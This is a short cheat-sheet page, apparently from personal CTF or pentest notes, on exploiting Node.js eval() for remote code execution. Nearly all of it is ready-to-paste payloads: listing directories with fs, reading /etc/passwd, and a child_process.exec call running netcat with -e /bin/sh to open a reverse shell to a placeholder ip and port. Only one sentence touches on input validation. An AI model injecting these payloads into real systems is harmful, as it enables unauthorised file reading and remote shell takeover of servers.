Web Exploitation 🕸️

Node.js eval() to RCE

Using direct eval() can cause remote code execution if not properly validate or sanitize the input. This will lead to abuse of modules such as process, fs (file system) and child_process modules.

process.cwd()     // print current directory


require('fs').readdirSync('/app').toString()     // same as dir & ls for listing the directory


require('fs').readFileSync("/etc/passwd").toString()      // read content of the file


require("child_process").exec('nc {ip} {port} -e /bin/sh')     // rce lead to reverse shell

To be continue..

Last updated 1 year ago